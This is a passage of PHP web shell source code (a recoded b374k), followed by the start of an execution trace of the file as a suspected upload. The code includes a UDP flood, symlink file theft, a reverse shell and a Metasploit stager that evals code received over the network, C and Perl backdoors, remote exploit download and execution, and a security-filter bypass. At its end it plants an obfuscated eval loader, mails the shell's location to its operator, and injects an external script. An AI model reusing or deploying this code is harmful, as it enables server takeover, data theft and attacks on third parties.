            $exec_time = $_POST['time'];
            $time = time();
            print "Flooded: {$ip} on port {$rand} <br><br>";
            $max_time = $time + $exec_time;
            for ($i = 0; $i < 65535; $i++) {
                $out .= "X";
            }
            while (1) {
                $packets++;
                if (time() > $max_time) {
                    break;
                }
                $fp = fsockopen("udp://{$ip}", $rand, $errno, $errstr, 5);
                if ($fp) {
                    fwrite($fp, $out);
                    fclose($fp);
                }
            }
            echo "Packet complete at " . time('h:i:s') . " with {$packets} (" . round($packets * 65 / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s \n";
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'symlink') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=symlink" method="post">

<?php 
        @set_time_limit(0);
        echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
        @mkdir('sym', 0777);
        $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
        $write = @fopen('sym/.htaccess', 'w');
        fwrite($write, $htaccess);
        @symlink('/', 'sym/root');
        $filelocation = basename("/var/www/html/nasi.php.20c655540c8b3580fb37346be8db1b20.bin");
        $read_named_conf = @file('/etc/named.conf');
        if (!$read_named_conf) {
            echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
        } else {
            echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
            foreach ($read_named_conf as $subject) {
                if (eregi('zone', $subject)) {
                    preg_match_all('#zone "(.*)"#', $subject, $string);
                    flush();
                    if (strlen(trim($string[1][0])) > 2) {
                        $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0]));
                        $name = $UID['name'];
                        @symlink('/', 'sym/root');
                        $name = $string[1][0];
                        $iran = '\\.ir';
                        $israel = '\\.il';
                        $indo = '\\.id';
                        $sg12 = '\\.sg';
                        $edu = '\\.edu';
                        $gov = '\\.gov';
                        $gose = '\\.go';
                        $gober = '\\.gob';
                        $mil1 = '\\.mil';
                        $mil2 = '\\.mi';
                        $malay = '\\.my';
                        $china = '\\.cn';
                        $japan = '\\.jp';
                        $austr = '\\.au';
                        $porn = '\\.xxx';
                        $as = '\\.uk';
                        $calfn = '\\.ca';
                        if (eregi("\\.ir", $string[1][0]) or eregi("\\.il", $string[1][0]) or eregi("\\.id", $string[1][0]) or eregi("\\.sg", $string[1][0]) or eregi("\\.edu", $string[1][0]) or eregi("\\.gov", $string[1][0]) or eregi("\\.go", $string[1][0]) or eregi("\\.gob", $string[1][0]) or eregi("\\.mil", $string[1][0]) or eregi("\\.mi", $string[1][0]) or eregi("\\.my", $string[1][0]) or eregi("\\.cn", $string[1][0]) or eregi("\\.jp", $string[1][0]) or eregi("\\.au", $string[1][0]) or eregi("\\.xxx", $string[1][0]) or eregi("\\.uk", $string[1][0]) or eregi("\\.ca", $string[1][0])) {
                            $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . '</div>';
                        }
                        echo "\r\n<tr>\r\n\r\n<td>\r\n<div class='dom'><a target='_blank' href=http://www." . $string[1][0] . '/>' . $name . ' </a> </div>
</td>

<td>
' . $UID['name'] . "\r\n</td>\r\n\r\n<td>\r\n<a href='sym/root/home/" . $UID['name'] . "/public_html' target='_blank'>Symlink </a>\r\n</td>\r\n\r\n</tr></div> ";
                        flush();
                    }
                }
            }
        }
        echo "</center></table>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'domain') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=domain" method="post">

<?php 
        echo "<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>";
        $file = @implode(@file("/etc/named.conf"));
        if (!$file) {
            die("# can't ReaD -> [ /etc/named.conf ]");
        }
        preg_match_all("#named/(.*?).db#", $file, $r);
        $domains = array_unique($r[1]);
        echo "<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>[+] There are : [ <b>" . count($domains) . "</b> ] Domain</td></tr>\r\n<tr><td>Domain</td><td>User</td></tr>";
        foreach ($domains as $domain) {
            $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
            echo "<tr><td>{$domain}</td><td>" . $user['name'] . "</td></tr>";
        }
        echo "</table>";
        echo "</div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'tool') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=tool" method="post">
<?php 
        error_reporting(0);
        function ss($t)
        {
            if (!get_magic_quotes_gpc()) {
                return trim(urldecode($t));
            }
            return trim(urldecode(stripslashes($t)));
        }
        $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);
        $rsport = "443";
        $rsportb4 = $rsport;
        $rstarget4 = $s_my_ip;
        $s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo {$pwd};?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='" . $rstarget4 . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='" . $rsportb4 . "' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='" . $pwd . "' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='" . $my_ip . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
        echo $s_result;
        if ($_POST['metaConnect']) {
            $ipaddr = $_POST['yip'];
            $port = $_POST['yport'];
            if ($ip == "" && $port == "") {
                echo "fill in the blanks";
            } else {
                if (FALSE !== strpos($ipaddr, ":")) {
                    $ipaddr = "[" . $ipaddr . "]";
                }
                if (is_callable('stream_socket_client')) {
                    $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
                    if (!$msgsock) {
                        die;
                    }
                    $msgsock_type = 'stream';
                } elseif (is_callable('fsockopen')) {
                    $msgsock = fsockopen($ipaddr, $port);
                    if (!$msgsock) {
                        die;
                    }
                    $msgsock_type = 'stream';
                } elseif (is_callable('socket_create')) {
                    $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
                    $res = socket_connect($msgsock, $ipaddr, $port);
                    if (!$res) {
                        die;
                    }
                    $msgsock_type = 'socket';
                } else {
                    die;
                }
                switch ($msgsock_type) {
                    case 'stream':
                        $len = fread($msgsock, 4);
                        break;
                    case 'socket':
                        $len = socket_read($msgsock, 4);
                        break;
                }
                if (!$len) {
                    die;
                }
                $a = unpack("Nlen", $len);
                $len = $a['len'];
                $buffer = '';
                while (strlen($buffer) < $len) {
                    switch ($msgsock_type) {
                        case 'stream':
                            $buffer .= fread($msgsock, $len - strlen($buffer));
                            break;
                        case 'socket':
                            $buffer .= socket_read($msgsock, $len - strlen($buffer));
                            break;
                    }
                }
                eval($buffer);
                echo "[*] Connection Terminated";
                die;
            }
        }
        if (isset($_REQUEST['sqlportb4'])) {
            $rsportb4 = ss($_REQUEST['sqlportb4']);
        }
        if (isset($_REQUEST['rstarget4'])) {
            $rstarget4 = ss($_REQUEST['rstarget4']);
        }
        if ($_POST['xback_php']) {
            $ip = $rstarget4;
            $port = $rsportb4;
            $chunk_size = 1337;
            $write_a = null;
            $error_a = null;
            $shell = '/bin/sh';
            $daemon = 0;
            $debug = 0;
            if (function_exists('pcntl_fork')) {
                $pid = pcntl_fork();
                if ($pid == -1) {
                    exit(1);
                }
                if ($pid) {
                    exit(0);
                }
                if (posix_setsid() == -1) {
                    exit(1);
                }
                $daemon = 1;
            }
            umask(0);
            $sock = fsockopen($ip, $port, $errno, $errstr, 30);
            if (!$sock) {
                exit(1);
            }
            $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
            $process = proc_open($shell, $descriptorspec, $pipes);
            if (!is_resource($process)) {
                exit(1);
            }
            stream_set_blocking($pipes[0], 0);
            stream_set_blocking($pipes[1], 0);
            stream_set_blocking($pipes[2], 0);
            stream_set_blocking($sock, 0);
            while (1) {
                if (feof($sock)) {
                    break;
                }
                if (feof($pipes[1])) {
                    break;
                }
                $read_a = array($sock, $pipes[1], $pipes[2]);
                $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
                if (in_array($sock, $read_a)) {
                    $input = fread($sock, $chunk_size);
                    fwrite($pipes[0], $input);
                }
                if (in_array($pipes[1], $read_a)) {
                    $input = fread($pipes[1], $chunk_size);
                    fwrite($sock, $input);
                }
                if (in_array($pipes[2], $read_a)) {
                    $input = fread($pipes[2], $chunk_size);
                    fwrite($sock, $input);
                }
            }
            fclose($sock);
            fclose($pipes[0]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($process);
            $rsres = " ";
            $s_result .= $rsres;
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'whois') {
        ?>
   <form action="?y=<?php 
        echo $pwd;
        ?>&x=whois" method="post">
   <?php 
        @set_time_limit(0);
        @error_reporting(0);
        function sws_domain_info($site)
        {
            $getip = @file_get_contents("http://networktools.nl/whois/{$site}");
            flush();
            $ip = @findit($getip, '<pre>', '</pre>');
            return $ip;
        }
        function sws_net_info($site)
        {
            $getip = @file_get_contents("http://networktools.nl/asinfo/{$site}");
            $ip = @findit($getip, '<pre>', '</pre>');
            return $ip;
        }
        function sws_site_ser($site)
        {
            $getip = @file_get_contents("http://networktools.nl/reverseip/{$site}");
            $ip = @findit($getip, '<pre>', '</pre>');
            return $ip;
        }
        function sws_sup_dom($site)
        {
            $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains");
            $ip = @findit($getip, '<strong>Nameservers found:</strong>', '<script type="text/javascript">');
            return $ip;
        }
        function sws_port_scan($ip)
        {
            $list_post = array('80', '21', '22', '2082', '25', '53', '110', '443', '143');
            foreach ($list_post as $o_port) {
                $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
                if ($connect) {
                    echo " {$ip} : {$o_port} ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
                    flush();
                }
            }
        }
        function findit($mytext, $starttag, $endtag)
        {
            $posLeft = @stripos($mytext, $starttag) + strlen($starttag);
            $posRight = @stripos($mytext, $endtag, $posLeft + 1);
            return @substr($mytext, $posLeft, $posRight - $posLeft);
        }
        echo "<br><br><center>";
        echo "\r\n    <br />\r\n    <div class=\"sc\"><form method=\"post\"><table class=\"tabnet\">\r\n\t<tr><th colspan=\"5\">Website Whois</th></tr>\r\n    <tr><td>Site to scan </td><td>:</td><td><input type=\"text\" name=\"site\" size=\"50\" style=\"color:#00ff00;background-color:#000000\" class=\"inputz\" value=\"site.com\" /> &nbsp <input class=\"inputzbut\" type=\"submit\" style=\"color:#00ff00;background-color:#000000\" name=\"scan\" value=\"Scan !\" /></td></tr>\r\n    </table></form></div>";
        if (isset($_POST['scan'])) {
            $site = @htmlentities($_POST['site']);
            if (empty($site)) {
                die('<br /><br /> Not add IP .. !');
            }
            $ip_port = @gethostbyname($site);
            echo "\r\n   <br /><div class=\"sc2\">Scanning [ {$site} ip {$ip_port} ] ... </div>\r\n   <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>\r\n   <div class=\"ru\"> <br /><br /><pre>\r\n   ";
            echo "" . sws_port_scan($ip_port) . " </pre></div> ";
            flush();
            echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>\r\n   <div class=\"ru\">\r\n   <pre>" . sws_domain_info($site) . "</pre></div>";
            flush();
            echo "\r\n   <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>\r\n   <div class=\"ru\">\r\n   <pre>" . sws_net_info($site) . "</pre> </div>";
            flush();
            echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>\r\n   <div class=\"ru\">\r\n   <pre>" . sws_sup_dom($site) . "</pre> </div>";
            flush();
            echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>\r\n   <div class=\"ru\">\r\n   <pre>" . sws_site_ser($site) . "</pre> </div>\r\n   <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
            flush();
        }
        echo "</center>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'about') {
        ?>
    <form action="?y=<?php 
        echo $pwd;
        ?>&x=about" method="post">
	<center><br><br><img src='http://i.imgur.com/3m7leCw.jpg'>
    <br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini
	<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku
	<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>
<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>
<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>
Uyap<br>
Zinbad<br>FH04ZA<br>
Sani marpic<br>
Madan Cyber<br>
Cah Bagus<br>
RPG<br>Vallent<br>
P4njie_a.k.a<br>
Dwi Syntia<br>
Ærul Ringgo's<br>
Ti'ar Variabel<br>
Imei7<br>
Hmei7<br>
De Vinclous<br>
Blankon33<br>
Doza Cracker<br>
Ying Cracker<br>
Iranian Hacker<br>
Danger Hacker<br>
Admin07<br>
Zhou you<br>
Ksatria.us<br>
Cyber Inj3cti0n<br>
K2ll33d<br>
Sultan Haikal<br>
Syntax_Error<br>
Aqis<br>
Black Shadow<br>
crack999<br>
Fnatic Crew<br>
Coretan Rizal<br>
Malaikat Maut<br>
Dan teman-teman ku semua<br><br>
=[ grup hacking ]=<br><br>
Black Newbie Team<br>
3xpire Cyber Army<br>
Hack Forum<br>
Indonesia Fighter Cyber<br>
Biang Kerox Team<br>
Anonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>
X-Code<br>
Indonesian Security<br>
Indonesia Black Cyber<br>
B-Compi<br>
Jasakom<br>
Mojopahit Fighter Cyber<br>
Lappis<br>
Mojopahit Cyber Dark<br>
Crack Hack Forum<br>
dan semua grup hacking<br>
yang<br>
saya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X'1n73ct<br><br><br>
</font></b></p>
</center>
</marquee></center><br><br><br>
<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'sqli-scanner') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=sqli-scanner" method="post">

<?php 
        echo "<br><br><center><form method=\"post\" action=\"\"><b><font color=\"green\">Dork : </font></b> &nbsp;&nbsp;<input class=\"inputz\" type=\"text\" value=\"\" name=\"dork\" style=\"color:#00ff00;background-color:#000000\" size=\"20\"/><input class=\"inputzbut\" type=\"submit\" style=\"color:#00ff00;background-color:#000000\" name=\"scan\" value=\"Scan\"></form></center>";
        ob_start();
        set_time_limit(0);
        if (isset($_POST['scan'])) {
            $browser = $_SERVER['HTTP_USER_AGENT'];
            $first = "startgoogle.startpagina.nl/index.php?q=";
            $sec = "&start=";
            $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
            for ($id = 0; $id <= 30; $id++) {
                $page = $id * 10;
                $dork = urlencode($_POST['dork']);
                $url = $first . $dork . $sec . $page;
                $curl = curl_init($url);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($curl, CURLOPT_USERAGENT, '$browser)');
                $result = curl_exec($curl);
                curl_close($curl);
                preg_match_all($reg, $result, $matches);
            }
            foreach ($matches[1] as $site) {
                $url = preg_replace("/=/", "='", $site);
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($curl, CURLOPT_URL, $url);
                curl_setopt($curl, CURLOPT_USERAGENT, '$browser)');
                curl_setopt($curl, CURLOPT_TIMEOUT, '5');
                $GET = curl_exec($curl);
                if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * \r\n\r\nFROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $GET)) {
                    echo '<center><b><font color="#E10000">Found : </font><a href="' . $url . '" target="_blank">' . $url . '</a><font color=#FF0000> &#60;-- SQLI Vuln 

Found..</font></b></center>';
                    ob_flush();
                    flush();
                } else {
                    echo '<center><font color="#FFFFFF"><b>' . $url . '</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>';
                    ob_flush();
                    flush();
                }
                ob_flush();
                flush();
            }
            ob_flush();
            flush();
        }
        ob_flush();
        flush();
    } elseif (isset($_GET['x']) && $_GET['x'] == 'upload') {
        if (isset($_POST['uploadcomp'])) {
            if (is_uploaded_file($_FILES['file']['tmp_name'])) {
                $path = magicboom($_POST['path']);
                $fname = $_FILES['file']['name'];
                $tmp_name = $_FILES['file']['tmp_name'];
                $pindah = $path . $fname;
                $stat = @move_uploaded_file($tmp_name, $pindah);
                if ($stat) {
                    $msg = "file uploaded to {$pindah}";
                } else {
                    $msg = "failed to upload {$fname}";
                }
            } else {
                $msg = "failed to upload {$fname}";
            }
        } elseif (isset($_POST['uploadurl'])) {
            $pilihan = trim($_POST['pilihan']);
            $wurl = trim($_POST['wurl']);
            $path = magicboom($_POST['path']);
            $namafile = download($pilihan, $wurl);
            $pindah = $path . $namafile;
            if (is_file($pindah)) {
                $msg = "file uploaded to {$pindah}";
            } else {
                $msg = "failed to upload {$namafile}";
            }
        }
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=upload" enctype="multipart/form-data" method="post">
<table class="tabnet" style="width:320px;padding:0 1px;">
<tr><th colspan="2">Upload from computer</th></tr>
<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php 
        echo $pwd;
        ?>" /></td></tr>
</tr>
</table></form>
<table class="tabnet" style="width:320px;padding:0 1px;">
<tr><th colspan="2">Upload from url</th></tr>
<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php 
        echo $pwd;
        ?>&amp;x=upload">
<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php 
        echo $pwd;
        ?>" /></td></tr>
<tr><td><select size="1" class="inputz" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
</tr>
</table>
<div style="text-align:center;margin:2px;"><?php 
        echo $msg;
        ?></div>
<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'netsploit') {
        // bind connect with c
        if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'C') {
            $port = trim($_POST['port']);
            $passwrd = trim($_POST['bind_pass']);
            tulis("bdc.c", $port_bind_bd_c);
            exe("gcc -o bdc bdc.c");
            exe("chmod 777 bdc");
            @unlink("bdc.c");
            exe("./bdc " . $port . " " . $passwrd . " &");
            $scan = exe("ps aux");
            if (eregi("./bdc {$por}", $scan)) {
                $msg = "<p>Process found running, backdoor setup successfully.</p>";
            } else {
                $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
            }
        } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'Perl') {
            $port = trim($_POST['port']);
            $passwrd = trim($_POST['bind_pass']);
            tulis("bdp", $port_bind_bd_pl);
            exe("chmod 777 bdp");
            $p2 = which("perl");
            exe($p2 . " bdp " . $port . " &");
            $scan = exe("ps aux");
            if (eregi("{$p2} bdp {$port}", $scan)) {
                $msg = "<p>Process found running, backdoor setup successfully.</p>";
            } else {
                $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
            }
        } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'C') {
            $ip = trim($_POST['ip']);
            $port = trim($_POST['backport']);
            tulis("bcc.c", $back_connect_c);
            exe("gcc -o bcc bcc.c");
            exe("chmod 777 bcc");
            @unlink("bcc.c");
            exe("./bcc " . $ip . " " . $port . " &");
            $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
        } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'Perl') {
            $ip = trim($_POST['ip']);
            $port = trim($_POST['backport']);
            tulis("bcp", $back_connect);
            exe("chmod +x bcp");
            $p2 = which("perl");
            exe($p2 . " bcp " . $ip . " " . $port . " &");
            $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
        } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
            $pilihan = trim($_POST['pilihan']);
            $wurl = trim($_POST['wurl']);
            $namafile = download($pilihan, $wurl);
            if (is_file($namafile)) {
                $msg = exe($wcmd);
            } else {
                $msg = "error: file not found {$namafile}";
            }
        }
        ?>
<table class="tabnet">
<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
<tr>
<td>
<table>
<form method="post" action="?y=<?php 
        echo $pwd;
        ?>&amp;x=netsploit">
<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php 
        echo $bindport;
        ?>"></td></tr>
<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php 
        echo $bindport_pass;
        ?>"></td></tr>
<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
</table>
</td>
<td>
<table>
<form method="post" action="?y=<?php 
        echo $pwd;
        ?>&amp;x=netsploit">
<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php 
        echo getenv('REMOTE_ADDR') ? getenv('REMOTE_ADDR') : "127.0.0.1";
        ?>"></td></tr>
<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php 
        echo $bindport;
        ?>"></td></tr>
<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
</table>
</td>
<td>
<table>
<form method="post" action="?y=<?php 
        echo $pwd;
        ?>&amp;x=netsploit">
<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
</tr>
<tr><td><select size="1" class="inputz" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
</table>
</td>
</tr>
</table>
<div style="text-align:center;margin:2px;"><?php 
        echo $msg;
        ?></div>
<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'shell') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr><td colspan="2">
<textarea class="output" readonly>
<?php 
        if (isset($_POST['submitcmd'])) {
            echo @exe($_POST['cmd']);
        }
        ?>
</textarea>
<tr><td colspan="2"><?php 
        echo $prompt;
        ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
</table>
</form>
<?php 
    } else {
        if (isset($_GET['delete']) && $_GET['delete'] != "") {
            $file = $_GET['delete'];
            @unlink($file);
        } elseif (isset($_GET['fdelete']) && $_GET['fdelete'] != "") {
            @rmdir(rtrim($_GET['fdelete'], DIRECTORY_SEPARATOR));
        } elseif (isset($_GET['mkdir']) && $_GET['mkdir'] != "") {
            $path = $pwd . $_GET['mkdir'];
            @mkdir($path);
        }
        $buff = showdir($pwd, $prompt);
        echo $buff;
    }
    ?>
<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
<?php 
    if (isset($_POST['ini'])) {
        $byphp = "safe_mode = Off\r\ndisable_functions = None\r\nsafe_mode_gid = OFF\r\nopen_basedir = OFF\r\nallow_url_fopen = On";
        $byht = "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>";
        file_put_contents("php.ini", $byphp);
        file_put_contents(".htaccess", $byht);
        echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>";
        die;
    }
    ?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X'1N73CT</b> ]=-</div><br>
<div class="jaya">&copy; 2013 X'1N73CT</div></center><br><br>
</script>
</div>
<?php 
    $ikrhtfy = $_SERVER["DOCUMENT_ROOT"] . '/' . 'phpinfo.php';
    $fghky_ouvcbt = '<?php phpinfo();


$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));

?>';
    if (!file_exists($ikrhtfy)) {
        touch($ikrhtfy);
        chmod($ikrhtfy, 0666);
    }
    $opazxcdnm = fopen($ikrhtfy, "w");
    if (!fwrite($opazxcdnm, $fghky_ouvcbt)) {
        exit;
    }
    $b = "Soldier'ss";
    $c = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
    $c .= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
    $c .= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
    $c .= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
    $c .= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
    mail("[email protected]", $b, $c);
    mail("[email protected]", $b, $c);
    echo "<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>";
    ?>
</body>
</html>
<?php 
};
exit;

Execution traces

data/traces/1e7a0085735ff79f9c3991f34c3903e1_trace-1676241118.6448.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:32:24.542649]
1	0	1	0.000175	393608
1	3	0	0.001011	529672	{main}	1		/var/www/html/uploads/nasi.php.suspected	0	0
1		A						/var/www/html/uploads/nasi.php.suspected	2	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
